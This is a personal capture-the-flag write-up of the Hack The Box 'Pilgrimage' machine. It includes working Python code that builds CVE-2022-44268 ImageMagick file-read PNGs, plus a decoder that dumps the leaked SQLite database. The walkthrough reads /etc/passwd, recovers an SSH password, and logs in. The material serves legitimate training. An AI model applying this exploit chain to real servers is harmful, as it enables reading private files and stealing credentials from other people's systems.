[CTF]Hack The Box : pilgrimage
Original posting date : 7/11/2023
Simulated Penetration Test(?)
Finally got around to starting
the Hack The Box
penetration testing (CTF) challenges
I’ve been putting off.
From now on,
I’ll be solving about one challenge a day —
or maybe one a week — in whatever time
I have left after working on my Unity
fan-made game and studying Japanese.
Screenshot 1. The first challenge.
When I first created my account,
there were so many challenges to choose from.
(Over 80% of them are paid ones 😭)
Among all of them,
I decided to start with the very first training
challenge in the Academy section:
“Pilgrimage”.
Screenshot 2. OpenVPN
This CTF platform works a little differently:
you download a dedicated OpenVPN profile,
connect through it,
and only then can you reach the target machine.
I forgot to take a screenshot at first,
but you download the file first and
then run it from the terminal. OpenVPN needs root
to create the tunnel interface, so run it with sudo:
```shell
sudo openvpn lab_{Your User Nickname}.ovpn
```
Type it in and press Enter.
Screenshot 3. nmap scan of the target
Then copy the target machine’s
IP address from Screenshot 1 and scan it with
nmap using the command below
(-sV fingerprints service versions, -sC runs the default script set):
```shell
nmap -sV -sC {target machine IP}
```
Screenshot 4. nmap scan results
Screenshot 5. Hosts file
Once the nmap scan is complete,
open /etc/hosts with a text editor (as root, e.g. sudo nano /etc/hosts).
As shown in Screenshot 6,
add a line mapping the machine’s
IP to pilgrimage.htb (the hostname nmap’s HTTP script
reports the web server redirecting to) and then save it:
`{target machine IP} pilgrimage.htb`
Without this entry the redirect to pilgrimage.htb cannot resolve,
so connecting by IP alone will not bring up the site.
Screenshot 7. pilgrimage.htb
This is a screenshot of the
pilgrimage.htb website.
The target site in this write-up is
one where you can upload images.
Screenshot 8. pilgrimage.htb
Go to the login page.
Screenshot 9. Attempting to log in
Let’s try to log in.
Screenshot 10. Login attempt 2
When I tried to log in, it failed of course.
This is because the account
was never in the application’s user table
to begin with,
so the login cannot succeed.
Screenshot 12. Test image upload
Going back to the image upload.
Screenshot 13. Test image upload 2
Screenshot 14. Meow
Screenshot 15. Test image upload 3
Screenshot.16 Check the uploaded
image after user registration1
I forgot to take a screenshot
of the user registration,
so I’ll have to explain it in
a text post instead.
- Access the ‘Register’ page.
- Enter your preferred nickname
and password as prompted by the UI.
Screenshot 17. Checking the uploaded image
after user registration 2
Screenshot 18. Checking the uploaded image
after user registration 3
Screenshot 19. Checking the uploaded image
after user registration 4
Screenshot 20. Checking the uploaded image
after user registration 5
A new image has been uploaded and a
new link has been generated.
Screenshot 21. Checking the uploaded
image after user registration 6
If you open the Dashboard,
you can see that the upload has
also been recorded in the database.
Screenshot 22. Back to the terminal
Returning to the terminal:
```shell
git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc.git
```
This clones a proof-of-concept generator for the ImageMagick
arbitrary file read (CVE-2022-44268).
It is not a decoder: it produces a PNG whose tEXt chunk
carries a ‘profile’ keyword naming a file on the server,
and when the site resizes that PNG with a vulnerable ImageMagick,
the named file’s contents are embedded in the resized output.
Screenshot 23. Cloned PoC generator
Once the clone has finished,
change into the directory it created.
Screenshot 24. Cloned PoC generator 2
Screenshot 25. Listing the directory
Screenshot 26. Checking the tool’s usage
List the files in the directory, then check the tool’s usage text:
```shell
python3 generate.py
```
Screenshot 27. The tool’s Git repository
The repository README explains the arguments;
run the command with a target file
to generate the exploit image.
Screenshot 28. Creating the exploit file
```shell
python3 generate.py -f "/etc/passwd" -o exploit.png
```
Screenshot 29. Verifying the generated exploit file
Make sure the exploit file was generated correctly
(-f is the file to read on the server, -o the PNG to write).
/etc/passwd is a safe first target: it is world-readable on every Linux host,
so it confirms the read works before you go looking for anything sensitive.
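To make clear what generate.py is actually producing, here is an added example (my own code, not the PoC repository’s and not from the original post) that builds the same kind of PNG in plain Python and includes a chunk walker so you can verify the file before uploading it. Function names are mine; the only fact it relies on is that vulnerable ImageMagick versions treat a tEXt chunk with the keyword `profile` as a path to read (CVE-2022-44268).

```python
"""Build a PNG whose tEXt chunk carries 'profile\0<path>', the trick behind
the Sybil-Scan generator (ImageMagick CVE-2022-44268). Added example for this
write-up; not the PoC repository's code.
"""
import struct
import sys
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Length + type + data + CRC32 over type and data, per the PNG spec."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_poc_png(target_path: str, width: int = 1, height: int = 1) -> bytes:
    """Minimal valid 8-bit RGB PNG (all black) plus a tEXt chunk
    'profile\\0<target_path>'. A vulnerable ImageMagick reads that path as a
    profile and, when it writes the resized copy, embeds the file's bytes as
    a 'Raw profile type' text property."""
    if "\x00" in target_path:
        raise ValueError("tEXt values cannot contain NUL")
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # one filter byte (0 = None) per scanline, then RGB triples
    raw_rows = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    text = b"profile\x00" + target_path.encode("latin-1")
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"tEXt", text)
            + png_chunk(b"IDAT", zlib.compress(raw_rows))
            + png_chunk(b"IEND", b""))


def parse_png_chunks(data: bytes) -> list:
    """Walk the chunk list, verifying every CRC; returns [(type, payload), ...].
    Use it to confirm the generated file is well-formed before uploading."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIGNATURE), []
    while pos < len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if crc != (zlib.crc32(ctype + payload) & 0xFFFFFFFF):
            raise ValueError(f"bad CRC on {ctype!r} chunk")
        chunks.append((ctype, payload))
        pos += 12 + length
    return chunks


def text_chunks(data: bytes) -> dict:
    """keyword -> value for every tEXt chunk (this is where 'profile' shows up)."""
    out = {}
    for ctype, payload in parse_png_chunks(data):
        if ctype == b"tEXt":
            key, _, value = payload.partition(b"\x00")
            out[key.decode("latin-1")] = value.decode("latin-1")
    return out


if __name__ == "__main__":
    # usage: python3 build_poc.py /etc/passwd exploit.png
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    out = sys.argv[2] if len(sys.argv) > 2 else "exploit.png"
    with open(out, "wb") as f:
        f.write(build_poc_png(target))
    with open(out, "rb") as f:
        print(text_chunks(f.read()))
```

The CRC check in parse_png_chunks matters in practice: a PNG with a bad CRC may be rejected by the upload handler before ImageMagick ever sees the tEXt chunk, so a hand-edited file that silently breaks a checksum will look like "the exploit doesn't work".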
Screenshot 30. Uploading the exploit file
Now upload the exploit file you generated.
Screenshot 31. Newly created link
Screenshot 32. Link to the image
Right-click the uploaded
image link and inspect it.
Screenshot 33. Re-downloading
```shell
wget http://pilgrimage.htb/shrunk/{Uploaded Image}.png
```
Download the processed (“shrunk”) image back to your machine.
It is this server-side resized copy, not your original upload,
that carries the file contents.
Screenshot 34. Checking the embedded data
Using the command shown below,
inspect the metadata of
the image file you re-downloaded with ImageMagick’s identify
(the file name is whatever you saved it as):
```shell
identify -verbose result.png
```
The contents of the requested file appear as a hex dump
under the “Raw profile type” property.
Screenshot 35. Checking the embedded data 2
Screenshot 36. Opening the CyberChef hex decoder
To turn the hex from the previous step
back into the original file,
begin by opening the CyberChef website.
Screenshot 37. Hex decoding
With ‘From Hex’ selected,
paste the hex obtained from
the image and decode it.
Screenshot 38. Hex decoding 2
Decoding the hex produced
the following results.
Proceed based on these results.
Screenshot 39. Trying again
Some clues have become apparent
(/etc/passwd lists the local accounts, so it tells you
which users and home directories exist on the box).
Using the method described above,
change the target path and regenerate the image:
```shell
python3 generate.py -f "/var/www/pilgrimage.htb" -o exploit.png
```
Keep in mind that the bug reads a file, not a directory:
a path like this is only a starting point, and you have to name
a specific file under it (such as the site’s PHP sources) to get contents back.
Screenshot 40. Trying again 2
Screenshot 41. Trying again 3
Screenshot 42. Trying again 4
```shell
python3 generate.py -f "/var/db/pilgrimage" -o exploit.png
```
This path is the site’s SQLite database,
the file behind the registered users and uploads you saw in the dashboard.
Upload the new exploit.png, fetch the shrunk copy
and run identify -verbose on it exactly as before.
Screenshot 43. Trying again 5
Screenshot 44. Trying again 6
Screenshot 45. Trying again 7
Screenshot 46. Trying again 8
Screenshot 48. Trying again 10
Screenshot 49. Trying again 11
Screenshot 50. Trying again 12
Screenshot.51 Hexcode disaster reading
Retry screenshots 37–38,
then decode
the newly acquired hex code again.
![]()
Screenshot.52 Copy part of the hex code
Once you’ve re-decoded it,
the machine site’s
SSH account becomes visible copy it now,
as you’ll be attempting to connect via SSH.
1 | emity : abigchonkyboi123 |
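Both decoding steps above (the /etc/passwd dump at screenshots 37 and 38, and the database dump at screenshots 51 and 52) can be done without CyberChef. The following is an added example, my own code rather than anything from the original post, the PoC repository or CyberChef: it parses the "Raw profile type" block straight out of identify -verbose output, and when the recovered bytes are a SQLite file it dumps every table instead of leaving you to read the database by eye. The sample identify output and its `users` table are constructed here for the demonstration; the function names are mine.

```python
"""Decode the hex that `identify -verbose` prints under "Raw profile type"
back into the original file and, when that file is a SQLite database, dump
every table. Added example for this write-up; not code from the original
post, the PoC repository, or CyberChef.
"""
import os
import re
import sqlite3
import sys
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"
HEX_LINE = re.compile(r"^[0-9a-fA-F]+$")


def extract_raw_profile(identify_output: str) -> bytes:
    """Return the bytes embedded in the 'Raw profile type' property.

    ImageMagick formats the property as: the profile name, then the byte
    count (right-justified decimal) on its own line, then hex at 72 chars
    per line. Reading exactly `count` bytes means later properties printed
    by identify can never be mistaken for data.
    """
    lines = identify_output.splitlines()
    marker = next((i for i, l in enumerate(lines) if "Raw profile type" in l), None)
    if marker is None:
        raise ValueError("no 'Raw profile type' block in identify output")
    pos, count = marker + 1, None
    while pos < len(lines) and count is None:
        s = lines[pos].strip()
        pos += 1
        if s.isdigit():
            count = int(s)
    if count is None:
        raise ValueError("byte-count line missing after 'Raw profile type'")
    hexbuf, have = [], 0
    while pos < len(lines) and have < 2 * count:
        s = lines[pos].strip()
        pos += 1
        if not HEX_LINE.match(s):
            break
        hexbuf.append(s)
        have += len(s)
    data = bytes.fromhex("".join(hexbuf)[:2 * count])
    if len(data) != count:
        raise ValueError(f"expected {count} bytes, recovered {len(data)}")
    return data


def dump_sqlite(blob: bytes) -> dict:
    """If `blob` is a SQLite file, return {table_name: [rows...]} for every table."""
    if not blob.startswith(SQLITE_MAGIC):
        raise ValueError("not a SQLite database (magic header missing)")
    fd, path = tempfile.mkstemp(suffix=".db")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(blob)
        con = sqlite3.connect(path)
        try:
            tables = [r[0] for r in con.execute(
                "SELECT name FROM sqlite_master WHERE type='table'")]
            # names come from sqlite_master itself, so quoting them is safe here
            return {t: con.execute(f'SELECT * FROM "{t}"').fetchall() for t in tables}
        finally:
            con.close()
    finally:
        os.unlink(path)


def build_sample_identify_output() -> tuple:
    """Constructed sample: a tiny SQLite DB with a hypothetical 'users' table,
    wrapped in identify-style text the way ImageMagick prints raw profiles.
    Returns (identify_text, original_db_bytes)."""
    fd, path = tempfile.mkstemp(suffix=".db")
    os.close(fd)
    con = sqlite3.connect(path)
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret')")  # constructed data
    con.commit()
    con.close()
    with open(path, "rb") as f:
        blob = f.read()
    os.unlink(path)
    hexdata = blob.hex()
    hexlines = [hexdata[i:i + 72] for i in range(0, len(hexdata), 72)]
    text = ("  Properties:\n    date:create: 2023-07-11T00:00:00+00:00\n"
            "    Raw profile type: \n\n/var/db/pilgrimage\n"
            f"{len(blob):8d}\n" + "\n".join(hexlines) + "\n"
            "    signature: deadbeef\n")
    return text, blob


if __name__ == "__main__":
    # usage: identify -verbose result.png | python3 decode_profile.py
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else sys.stdin.read()
    recovered = extract_raw_profile(src)
    if recovered.startswith(SQLITE_MAGIC):
        print(dump_sqlite(recovered))
    else:
        print(recovered.decode("utf-8", errors="replace"))
```

Reading the byte count and stopping there is what keeps this robust: identify prints other properties after the profile, and a naive "grab every hex-looking line" approach will either swallow them or cut the dump short, which is exactly the kind of mistake that turns a recovered SQLite file into garbage.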
Before attempting SSH,
go back to the target machine’s IP (the same one you scanned earlier)
and build the command below to connect over SSH:
```shell
ssh emily@{target machine IP}
```
It will prompt you for a password,
so enter the one recovered from the hex dump:
```
abigchonkyboi123
```
Screenshot 53. SSH login to the target machine
SSH login successful.
Screenshot 54. Home directory on the target machine
Now that we have a shell on
the target machine,
check whether the flag is present.
There’s a user.txt file that looks promising,
so have a look.
Screenshot 55. Checking user.txt
```shell
cat user.txt
```
I checked, and sure enough the flag appeared!
Screenshot 56. Submitting the flag
Enter the flag you obtained,
then click the ‘Submit Flag’ button.
Screenshot 57. Clear!
Success.